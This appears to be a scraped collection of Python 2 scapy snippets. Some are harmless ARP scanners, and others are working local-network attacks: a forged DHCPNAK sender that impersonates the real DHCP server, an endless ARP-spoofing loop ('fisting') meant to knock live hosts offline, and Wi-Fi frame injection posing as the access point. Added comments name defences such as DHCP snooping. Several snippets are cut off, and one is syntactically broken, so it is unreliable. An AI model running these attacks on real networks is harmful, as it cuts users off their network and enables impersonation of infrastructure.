def arping(iprange="10.0.1.0/24"):
    """Broadcast an ARP who-has for *iprange* and collect the replies.

    *iprange* is a single IP address or a network (default ``10.0.1.0/24``).
    Returns a list with one ``[ip, mac]`` pair of strings per answer that
    arrived within the 2 second timeout; targets that stayed silent are not
    listed. Both values are read from the reply itself (``ARP.psrc`` and
    ``Ether.src``); ARP replies are unauthenticated, so the result is what
    hosts claimed, not a verified inventory.

    Side effect: sets the global ``conf.verb`` to 0.
    """
    conf.verb = 0
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange)
    answered, _unanswered = srp(probe, timeout=2)
    # sprintf renders "<sender IP> <source MAC>"; split() turns it into [ip, mac].
    return [reply.sprintf(r"%ARP.psrc% %Ether.src%").split()
            for _sent, reply in answered]
Beispiel #2
def nak_request(pkt):
    """Send a forged DHCPNAK that impersonates the recorded DHCP server.

    The frame is derived from the observed packet ``pkt``: its Ethernet and
    IP destinations are reused, its BOOTP ``xid`` is echoed back, and its
    Ethernet/IP source addresses become ``chaddr``/``ciaddr``. The Ethernet
    source, IP source and ``server_id`` option come from the module-level
    ``dhcp_server_mac`` / ``dhcp_server_ip`` values rather than from this
    host's own addresses.

    Defensive note: DHCP does not authenticate any of these fields, so a
    client cannot tell this NAK from a genuine one. Switch-side DHCP
    snooping, which drops server messages (UDP source port 67) arriving on
    untrusted access ports, is the usual control against it.
    """
    server_mac = globals()['dhcp_server_mac']
    msg("Spoofing DHCPNAK from " + server_mac, 2)

    # Layers are built in the same order as they are stacked.
    ether = Ether(src=server_mac, dst=pkt[Ether].dst)
    server_ip = globals()['dhcp_server_ip']
    ip = IP(src=server_ip, dst=pkt[IP].dst)
    udp = UDP(sport=67, dport=68)
    bootp = BOOTP(op=2,
                  ciaddr=pkt[IP].src,
                  siaddr=pkt[IP].dst,
                  chaddr=pkt[Ether].src,
                  xid=pkt[BOOTP].xid)
    # The terminator is the bare string 'end' (the original's ('end') is
    # not a tuple).
    dhcp = DHCP(options=[('server_id', server_ip),
                         ('message-type', 'nak'),
                         'end'])
    sendp(ether / ip / udp / bootp / dhcp)
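def arping(iprange="10.0.1.0/24"):
    """Broadcast an ARP who-has for *iprange* and return the answers.

    Returns a list of ``[ip, mac]`` string pairs, one per reply received
    within the 2 second timeout. The values are whatever the replying host
    put into ``ARP.psrc`` and ``Ether.src``; ARP offers no authentication,
    so treat them as claims. Sets the global ``conf.verb`` to 0.
    """
    conf.verb = 0
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange),
                     timeout=2)

    collection = []
    for snd, rcv in ans:
        # "<sender IP> <source MAC>" -> [ip, mac]
        result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split()
        collection.append(result)
    return collection


# The entry point was indented under arping() after its return statement, so
# it could never run; it belongs at module level. The fallback call was also
# misspelled ("apring").
if __name__ == '__main__':
    if len(sys.argv) > 1:
        # One scan per command-line argument.
        for ip in sys.argv[1:]:
            print "arping", ip
            print arping(ip)
    else:
        # No argument: scan the default range.
        print arping()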
Beispiel #4
def fisting():
    """Probe each address taken from argv[1] and send a forged ARP reply to live ones.

    For every target the loop (1) broadcasts an ARP who-has, (2) if exactly
    one answer arrives, sends an ARP reply (op=2) whose sender IP is set to
    the target's own address, and (3) probes again and reports whether the
    target stopped answering. The outer loop never ends on its own.

    NOTE(review): for defenders, the frame sent here is an unsolicited ARP
    reply in which sender IP equals target IP; hwsrc is not set, so it is
    presumably this host's MAC. Duplicate-address log entries on hosts and
    Dynamic ARP Inspection on switches are the usual places such frames are
    noticed or dropped.
    """
    # op=2 is an ARP reply ("is-at"). The packet is iterated below, one
    # packet per address -- presumably argv[1] may name a network; confirm.
    arp_fist = ARP(pdst=argv[1], op=2)
    print "We are going to loop forever, CTRL-C to stop...\n"
    while True:
        sleep(3)
        for a in arp_fist:
            # Liveness probe: broadcast who-has for this address.
            arping = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=a.pdst)
            ans, unans = srp(arping, timeout=0.1)
            if len(ans) == 1:
                # The reply claims the target's own IP as its sender address.
                a.psrc = a.pdst
                print a.pdst, "is ALIVE!"
                print "* Time to shut it down!"
                send(a)
                # Same probe again; an unanswered probe is counted as success.
                ans2, unans2 = srp(arping, timeout=0.1)
                if len(unans2) == 1:
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    print "@@@", a.psrc, "was rubber fisted!"
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    sleep(3)
                else:
                    print "FAILED:", a.pdst, "is still alive :-("
            else:
                # Zero answers (or more than one) to the first probe.
                print a.pdst, "is already DEAD!"
            print
Beispiel #5
print "Interface %s created. Configure it and use it" % ifname

# Speed optimization since Scapy does not have to parse payloads: with an
# empty payload_guess list, presumably nothing above Ether/SNAP is dissected.
Ether.payload_guess = []
SNAP.payload_guess = []

# NOTE(review): the except/finally clause of this try is not part of the excerpt.
try:
    while 1:
        # Block (no timeout given) until f or s is readable; both are opened
        # outside this excerpt.
        r = select([f, s], [], [])[0]

        # frame from /dev/net/tun
        if f in r:

            # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
            buf = os.read(f, 1526)
            # Skip the first 4 bytes (the "+ 4" above) and dissect the rest
            # as an Ethernet frame.
            eth_rcvd_frame = Ether(buf[4:])

            if DEBUG:
                # File descriptor 1 is stdout.
                os.write(1, "Received from %s\n" % ifname)
                if VERB:
                    os.write(1, "%s\n" % eth_rcvd_frame.summary())

            # Prepare Dot11 frame for injection: a from-DS data frame whose
            # addr1 is the Ethernet destination and whose addr2 is BSSID.
            # NOTE(review): a from-DS frame with addr2=BSSID presents itself
            # as sent by the access point; without link-layer frame
            # protection a receiver cannot verify that.
            dot11_sent_frame = Dot11(type="Data",
                                     FCfield="from-DS",
                                     addr1=eth_rcvd_frame.getlayer(Ether).dst,
                                     addr2=BSSID)
            # It doesn't seem possible to set tuntap interface MAC address
            # when we create it, so we set source MAC here
            if not HAS_SMAC:
                dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
Beispiel #6
# Presumably tracks DHCPNAK attempts; the code that fills it is outside
# this excerpt.
attempted_dhcpnaks = dict()

# MAC addresses of DHCP clients that have sent a DHCPREQUEST. They are
# cross-referenced with ARP packets to see from which DHCP server a lease
# was obtained.
macs = dict()


def msg(string, level):
    """Print *string* when the module-level ``verbose`` value is at least *level*.

    ``verbose`` is looked up in the module globals on every call, so it must
    be set before the first message is emitted.
    """
    verbosity = globals()['verbose']
    if not (verbosity >= level):
        return
    print(string)


# Broadcast a DHCPDISCOVER to acquire the DHCP server IP.
# The all-zero source MAC / chaddr and the fixed xid 0x10000000 are constants,
# so this probe is easy to recognise in a packet capture.
msg("Sending DHCPDISCOVER packet to discover DHCP servers", 2)
sendp(
    Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")
    / IP(src="0.0.0.0", dst="255.255.255.255")
    / UDP(sport=68, dport=67)
    / BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000)
    / DHCP(options=[('message-type', 'discover'), 'end'])
)


# Extract the DHCP server's IP address and store it in a global variable. We ignore our
# own DHCP server via a bpf filter in the sniff command below.
def get_dhcp_server(pkt):
    """Record the sender of a DHCP offer as the network's DHCP server.

    When the first DHCP option of ``pkt`` carries the value 2 (presumably the
    message-type option, where 2 is DHCPOFFER), the packet's IP and Ethernet
    source addresses are stored in the module-level ``dhcp_server_ip`` and
    ``dhcp_server_mac``. Other packets are ignored.

    NOTE(review): the sender is accepted without any verification, and each
    matching packet overwrites the previous values, so "legit" only means
    "answered the DISCOVER".
    """
    if not (pkt[DHCP] and pkt[DHCP].options[0][1] == 2):
        return

    shared = globals()
    shared["dhcp_server_ip"] = pkt[IP].src
    shared["dhcp_server_mac"] = pkt[Ether].src
    msg("Legit DHCP server found on " + shared['dhcp_server_ip'], 1)


# Detecting DHCPREQUEST packets and ARP packets.
Beispiel #7
 def __call__(self):
     """Return a scapy ``Ether`` packet rebuilt from the stored bytes.

     The packet is dissected anew from ``self.____contents`` on every call
     and its ``time`` attribute is restored from ``self.____time``. Inside a
     class body Python name-mangles both attribute names (they start with
     two or more underscores), so they are private to the defining class.
     """
     restored = Ether(self.____contents)
     restored.time = self.____time
     return restored
Beispiel #8
print "Interface %s created. Configure it and use it" % ifname

# Speed optimization since Scapy does not have to parse payloads
Ether.payload_guess=[]
SNAP.payload_guess=[]

# NOTE(review): the indentation below mixes tabs and spaces (one tab counts as
# 8 columns). Python 3 rejects that with TabError; normalise to spaces before
# reusing this code. The except/finally clause of this try is not part of the
# excerpt.
try:
    while 1:
        # Block (no timeout given) until f or s is readable.
        r = select([f,s],[],[])[0]

	# frame from /dev/net/tun
	if f in r:

	    # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
	    buf = os.read(f,1526)
            # Skip the first 4 bytes and dissect the rest as an Ethernet frame.
            eth_rcvd_frame=Ether(buf[4:])

	    if DEBUG:
	        os.write(1,"Received from %s\n" % ifname)
		if VERB:
		    os.write(1,"%s\n" % eth_rcvd_frame.summary())
	    
	# Prepare Dot11 frame for injection: a from-DS data frame whose addr1 is
	# the Ethernet destination and whose addr2 is BSSID.
	    dot11_sent_frame = Dot11(
		type = "Data",
		FCfield = "from-DS",
		addr1 = eth_rcvd_frame.getlayer(Ether).dst,
		addr2 = BSSID)
	# It doesn't seem possible to set tuntap interface MAC address
	# when we create it, so we set source MAC here
	# NOTE(review): the body of the following "if" is cut off in this excerpt.
	    if not HAS_SMAC:
Beispiel #9
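#! /usr/bin/env python
# arping2tex : arpings a network and outputs a LaTeX table as result
import sys

# Exactly one argument is expected: the host or network to probe.
if len(sys.argv) != 2:
    print "Usage: arping2tex <net>\n eg: arping2tex 192.168.1.0/24"
    sys.exit(1)

# Imported only after the usage check has passed.
from scapy import srp, Ether, ARP, conf

conf.verb = 0
# Broadcast an ARP who-has for the requested range and wait 2 seconds.
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=sys.argv[1]),
                 timeout=2)

# Emit one table row per reply. The MAC and IP are whatever the replying
# host claimed and are written into the LaTeX source unescaped; presumably
# scapy renders them as hex-with-colons and dotted-quad only -- confirm.
print "\\begin{tabular}{|l|l|}"
print "\\hline"
print "MAC & IP\\\\"
print "\\hline"
for s, r in ans:
    print r.sprintf("%Ether.src% & %ARP.psrc%\\\\")
print "\\hline"
# "\e" is not a valid escape sequence; the backslash is now escaped like on
# the other lines. The printed text is unchanged.
print "\\end{tabular}"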
Beispiel #10
from scapy import srp,Ether,ARP,conf

# Silence scapy's own output; only the result lines below are printed.
conf.verb = 0

# Broadcast an ARP who-has for 10.0.1.1 and wait up to 2 seconds for replies.
ans, unans = srp(
    Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="10.0.1.1"),
    timeout=2,
)

# One line per reply: "<source MAC> <sender IP>", both as claimed by the
# replying host (ARP replies are not authenticated).
for snd, rcv in ans:
    print rcv.sprintf(r"%Ether.src% %ARP.psrc%")
Beispiel #11
#from scapy.all import srp,Ether,ARP,conf
import sys
from datetime import datetime
# NOTE(review): this try has no except/finally clause and the assignment to
# "ips" is cut off (presumably another raw_input call); the excerpt is
# truncated here and does not parse as it stands.
try:
    interface = raw_input("enter iface")
    ips = raw
try:
    from scapy import srp,Ether,ARP,conf
except ImportError:
    # NOTE(review): "scapy" was never bound if the import above failed, so
    # this del would raise NameError before the fallback import runs.
    del scapy
    from scapy import all as scapy
conf.verb = 0
# NOTE(review): the srp() call is closed right after Ether(...), so ARP is
# used without a target and the keyword arguments fall outside the call;
# this line is a syntax error. Presumably the intent was
# srp(Ether(...)/ARP(pdst=<targets>), timeout=2, iface=interface, inter=0.1)
# -- confirm against the original script.
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff"))/ARP, timeout = 2, iface = interface, inter =0.1

Beispiel #12
 def __call__(self):
     """Rebuild the original scapy packet from the stored raw contents.

     A new ``Ether`` packet is dissected from ``self.____contents`` each
     time, and its ``time`` attribute is set to ``self.____time``. Both
     attribute names begin with two or more underscores, so Python
     name-mangles them when this method sits in a class body.
     """
     packet = Ether(self.____contents)
     packet.time = self.____time
     return packet